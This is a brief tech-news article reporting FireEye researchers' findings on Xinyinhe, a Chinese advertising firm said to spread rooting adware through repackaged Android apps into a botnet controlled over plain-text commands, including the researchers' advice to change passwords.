A Chinese advertising company has infected and ‘completely’ hijacked likely hundreds of thousands of Android handsets with an attack.
The attack was so careless it exposes a global botnet to easy hijacking and opens handsets to total compromise by any malware.
FireEye researchers Yulong Zhang, Zhaofeng Chen, and Yong Kang say Chinese app advertising company Xinyinhe is behind the attack.
They didn’t tag the number of infected devices, but Xinyinhe claims to have ‘customers’ in 50 countries and be valued as of November at $100 million after it received some $20 million in seed funding in 2013.
The team said the attack builds its network of customers by tricking them to install malware that gains root access on some 308 different handsets running virtually all versions of the Android operating system from Gingerbread (2.3.4) to the lastest stable Lollipop (5.1.1) build.
These victims are enslaved into a “very large” global botnet that incredulously uses plain text for command and control communications allowing “anyone” to hijack it.
Once infected the malware will install legitimate but booby trapped applications without user consent, automatically clicking installation and permission warning prompts.
It installs a backdoor and maintains persistence on devices, and opens its attack vector to compromise by third party malware.
“This is a worldwide, spreading malicious adware family with a high threat, likely controlled by a Chinese organisation,” the researchers say.
“Any affected user may have inadvertently compromised their user credentials for some online services [and should] change their passwords for any online services such as iTunes, online banking, email, and work accounts.”
The trio says the attackers are so careless that the infected app which have “full control” root access to phones will allow anyone malware share that privileged access.
This means writers of less harmful malware could take advantage of the infections to gain root privilege, hijack the devices, and inflict “permanent damages”.
So far some 300 infected apps have been discovered including the popular Amazon app, Memory Booster, and Clean Master.
The adware uses “novel” and impressive techniques for persistence and obfuscation such as installing system level services, and modifying the boot recovery script used to flash new operating system ROMs.
Zhang, Chen, and Kang say attackers have repackaged the popular apps with malicious logic that is continuously updated.
551 total views, 0 views today